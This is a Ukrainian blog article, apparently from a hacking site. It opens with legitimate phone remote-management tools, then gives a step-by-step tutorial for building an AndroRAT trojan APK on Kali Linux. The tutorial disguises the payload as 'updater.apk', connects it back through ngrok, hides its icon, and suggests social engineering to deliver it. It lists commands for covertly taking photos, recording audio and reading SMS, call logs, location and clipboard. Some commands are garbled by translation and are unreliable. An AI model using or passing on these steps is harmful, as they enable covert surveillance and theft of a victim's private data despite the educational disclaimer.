Доповнення Maltego можуть розширити ваші можливості в OSINT та аналізі даних. Дізнайтеся, як вибрати і використовувати ці модулі для підвищення продуктивності та точності вашої роботи.
355 
Дистанційне керування телефоном може бути корисним у різних ситуаціях, наприклад, коли ви загубили свій пристрій, його вкрали або вам потрібно отримати доступ до певних функцій чи файлів під час вашої відсутності. Існує безліч способів навіщо потрібно іноді використоувати віддалене використування телефону. Знайти мій пристрій/додаток: багато платформ смартфонів пропонують вбудовані функції відстеження та дистанційного керування. Наприклад, «Знайти мій iPhone» для пристроїв iOS, «Знайти мій пристрій» для пристроїв Android і «Знайти мій мобільний телефон» для пристроїв Samsung дозволяють відстежувати місцезнаходження вашого телефону, дистанційно блокувати чи стерти з нього дані та відтворювати звук, щоб допомогти знайти його. Існує безліч різних способів дистанційного контролю телефону.
Вони лише нададуть зручний доступ до отриманої інформації за допомогою панелі керування на своєму сайті. Рішення для керування мобільними пристроями (MDM): Рішення для керування мобільними пристроями зазвичай використовуються в корпоративних середовищах для дистанційного керування декількома пристроями. Ці рішення, як-от Microsoft Intune або VMware Workspace ONE, надають функції дистанційного керування, стирання даних, керування програмами та відстеження пристроїв. Спеціальні рішення для виробника: деякі виробники смартфонів пропонують власні рішення для дистанційного керування. Наприклад, програма SmartThings від Samsung дозволяє дистанційно керувати сумісними пристроями Samsung, включаючи блокування/розблокування, керування параметрами пристрою та керування пристроями розумного будинку. Важливо зазначити, що можливості дистанційного керування можуть відрізнятися залежно від пристрою, операційної системи та конкретних програм, які ви вибрали. Крім того, з міркувань безпеки рекомендується ввімкнути двофакторну автентифікацію, використовувати надійні паролі та оновлювати програмне забезпечення пристрою для захисту від несанкціонованого доступу.
Сьогодні я пропоную розглянути безкоштовний спосіб віддаленого контролю телефону за допомогою AndroRAT та Kali Linux. Стаття написана з освітньою метою для навчання пентестерів (білих хакерів). Для демонстрації роботи були використані наші особисті пристрої. Використання подібних інструментів на чужих пристроях без належного дозволу є незаконним і розцінюється як кримінальний злочин. Ні редакція hackyourmom.com, ні автор не відповідають за ваші дії.
Встановити Android на Kali Linux.
Встановити та налаштувати ngrok.
Створити корисне навантаження (файл .apk, що виконується).
Встановити apk файл на цільовий пристрій.
Що таке AndroRAT?
AndroRAT (Remote Access Tool/Trojan. AndroRAT) – призначений для віддаленого керування телефоном Android. Це клієнт-серверна програма, розроблена на Java Android для клієнтської частини, а серверна частина написана на Python.
Інструмент працюватиме на пристроях від Android 4.1 (Jellybean), Android 9 (Oreo), (від API 16 до API 28). Цей RAT може бути встановлений на Android 10 і вище, але деякі команди для отримання інформації працюватимуть нестабільно.
Можливості AndroRAT:
Бекдор (автоматичне підключення).
Невидимий значок після встановлення.
Використовує мінімальні ресурси пристрою.
Автоматичний запуск після перезавантаження смартфона.
Можливість робити знімки з обох камер
Аудіо запис з мікрофона.
Перегляд журналу дзвінків та SMS.
Отримання поточного розташування.
Інформація про SIM-картку, IP-адресу та MAC-адресу пристрою.
Я також рекомендую звернути увагу на ще один інструмент для віддаленого контролю телефону – L3MON
Для роботи Андроїд потрібен Python3. Для встановлення Python3 на Kali, використовуйте команду:
sudo apt встановити python3 python3-pip
Тепер потрібно встановити Java OpenJDK 8 на Kali Linux.
Наступний крок клонування (установка) AndroRAT на Kali:
git гілка https://github.com/karma9874/AndroRAT
Переходимо до каталогу AndroРАТ за допомогою команди mv:
мв AndroРАТ
Встановлюємо залежності AndroRAT:
pip3 install -r requirements.txt
Після цього потрібно встановити ngrok та встановити токен аутентифікації ngrok.
Для створення файлу APK потрібно виконати команду:
python3 androRAT.py –build –ngrok -p 8888 -o ~/Desktop/updater.apk
Аргумент –build, що використовується в команді, використовує скрипт python androRAT.py і створює корисне навантаження (файл .apk). Аргумент -ngrok використовується для віддаленого підключення через ngrok.
У локальній мережі можна використовувати ngrok і запустити команду з параметром -i. Після чого буде запущено слухача, який очікує зворотного підключення.
Щоб вибрати іконку програми, можна використовувати аргумент –icon. У моєму випадку я хочу отримати прихований віддалений доступ до смартфону, тому пропускаю це налаштування.
Параметр -o відповідає за вибір порту та розташування файлу .apk.
На скрині вище бачимо, що AndroRAT створює і підписує файл .apk. Після створення файлу буде запущено прослуховувач, який очікує підключення:
Тепер можна надіслати apk файл на смартфон. Якщо у вас немає фізичного доступу до пристрою, тоді можна застосувати методи соціальної інженерії. Але майте на увазі це незаконно, якщо у вас немає письмового дозволу на проведення пентесту.
Наприклад, встановимо АндроРАТ на свій персональний планшет. Після встановлення файлу на цільовому пристрої ви побачите наступне повідомлення в терміналі Kali:
З’єднання встановлено. Тепер для взаємодії з програмою будемо використовувати команди:
deviceInfo – основна інформація про пристрій.
camList – ідентифікатор камери.
takepic [ідентифікатор камери] – знімок з камери.
startVideo [ID камери] — запис відео.
stopVideo — Зупинити запис відео та відкрити відеофайл.
startAudio — запись звука.
stopAudio — Зупинити запис звуку.
getSMS [inbox|sent] – вхідні / надіслані смс.
getCallLogs – історія дзвінків.
shell – запуск оболонки sh.
vibrate [количество_раз] — вибрация.
getLocation — розташування пристрою.
getIP — ip-пристрої.
getSimDetails – інформація про всі sim-картки.
clear – очищення екрана.
getClipData – дані з буфера обміну.
getMACAddress — mac-адреса пристрою.
exit – вихід.
Наприклад, для отримання всіх SMS запустимо команду getSMS:
Так само, якщо ми хочемо зробити знімок з камери, потрібно запустити команду camList. Після цього з’явиться список усіх камер телефону. Потім можна зробити знімок за допомогою команди
takepic [номер камери]
Майте на увазі, якщо на телефоні увімкнено режим енергозбереження, корисне навантаження не зможе підключитися. Деякі команди Android версії 11 і вище можуть працювати нестабільно.
Ось таким чином ми можемо дистанційно керувати або контролювати телефон Android на Kali Linux. Сподіваюся, стаття була корисна.
355 
338 
371